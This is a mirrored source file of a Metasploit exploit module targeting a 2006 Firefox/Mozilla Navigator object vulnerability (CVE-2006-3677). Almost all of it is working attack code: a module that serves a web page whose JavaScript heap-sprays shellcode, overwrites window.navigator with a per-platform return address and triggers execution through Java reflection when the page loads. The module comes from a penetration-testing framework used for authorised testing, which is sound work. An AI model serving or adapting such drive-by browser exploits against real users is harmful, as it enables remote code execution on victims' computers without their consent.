CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/mozilla_navigatorjava.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6


7
class MetasploitModule < Msf::Exploit::Remote

8
  Rank = NormalRanking

9


10
  include Msf::Exploit::Remote::HttpServer::HTML

11


12
  #include Msf::Exploit::Remote::BrowserAutopwn

13
  #autopwn_info({

14
  #  :ua_name    => HttpClients::FF,

15
  #  :ua_minver  => "1.5.0",

16
  #  :ua_maxver  => "1.5.1",

17
  #  :javascript => true,

18
  #  :rank       => NormalRanking, # reliable memory corruption

19
  #  :vuln_test  => %Q|

20
  #    is_vuln = false;

21
  #    if (navigator.javaEnabled()){

22
  #      is_vuln = true;

23
  #    }

24
  #    |,

25
  #})

26


27
  def initialize(info = {})

28
    super(update_info(info,

29
      'Name'           => 'Mozilla Suite/Firefox Navigator Object Code Execution',

30
      'Description'    => %q{

31
          This module exploits a code execution vulnerability in the Mozilla

32
        Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit

33
        requires the Java plugin to be installed.

34
      },

35
      'License'        => MSF_LICENSE,

36
      'Author'         =>  ['hdm'],

37
      'References'     =>

38
        [

39
          ['CVE',    '2006-3677'],

40
          ['OSVDB',  '27559'],

41
          ['BID',    '19192'],

42
          ['URL',    'http://www.mozilla.org/security/announce/mfsa2006-45.html']

43
        ],

44
      'Payload'        =>

45
        {

46
          'Space'    => 512,

47
          'BadChars' => "",

48
        },

49
      'Platform'       => %w{ win linux osx },

50
      'Targets'        =>

51
        [

52
          [ 'Firefox 1.5.0.4 Windows x86',

53
            {

54
              'Platform' => 'win',

55
              'Arch' => ARCH_X86,

56
              'Ret'  => 0x08000800,

57
              'Fill' => "%u0800",

58
            }

59
          ],

60
          [ 'Firefox 1.5.0.4 Linux x86',

61
            {

62
              'Platform' => 'linux',

63
              'Arch' => ARCH_X86,

64
              'Ret'  => -0x58000000,

65
              'Fill' => "%ua8a8",

66
            }

67
          ],

68
          [ 'Firefox 1.5.0.4 Mac OS X PPC',

69
            {

70
              'Platform' => 'osx',

71
              'Arch' => ARCH_PPC,

72
              'Ret'  => 0x0c000000,

73
              'Fill' => "%u0c0c",

74
            }

75
          ],

76
          [ 'Firefox 1.5.0.4 Mac OS X x86',

77
            {

78
              'Platform' => 'osx',

79
              'Arch' => ARCH_X86,

80
              'Ret'  => 0x1c000000,

81
              'Fill' => "%u1c1c",

82
            }

83
          ],

84
        ],

85
      'DisclosureDate' => '2006-07-25'

86
      ))

87
  end

88


89
  def on_request_uri(cli, request)

90


91
    # Re-generate the payload

92
    return if ((p = regenerate_payload(cli)) == nil)

93


94
    print_status("Sending #{self.name}")

95
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

96


97
    # Handle the payload

98
    handler(cli)

99
  end

100


101
  def generate_html(payload)

102


103
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

104


105
    return %Q|

106
<html><head>

107
<script>

108
  function Exploit() {

109
    if (window.navigator.javaEnabled) {

110
      var shellcode = unescape("#{enc_code}");

111
      var b = unescape("#{target['Fill']}");

112
      while (b.length <= 0x400000) b+=b;

113


114
      var c = new Array();

115
      for (var i =0; i<36; i++) {

116
        c[i] =

117
          b.substring(0,  0x100000 - shellcode.length) + shellcode +

118
          b.substring(0,  0x100000 - shellcode.length) + shellcode +

119
          b.substring(0,  0x100000 - shellcode.length) + shellcode +

120
          b.substring(0,  0x100000 - shellcode.length) + shellcode;

121
      }

122


123
      window.navigator = (#{target['Ret']} / 2);

124
      try {

125
        java.lang.reflect.Runtime.newInstance(

126
          java.lang.Class.forName("java.lang.Runtime"), 0

127
        );

128
      }catch(e){

129


130
      }

131
    }

132
  }

133
</script>

134
</head><body onload='Exploit()'>Please wait...</body></html>

135
    |

136
  end

137
end

138


139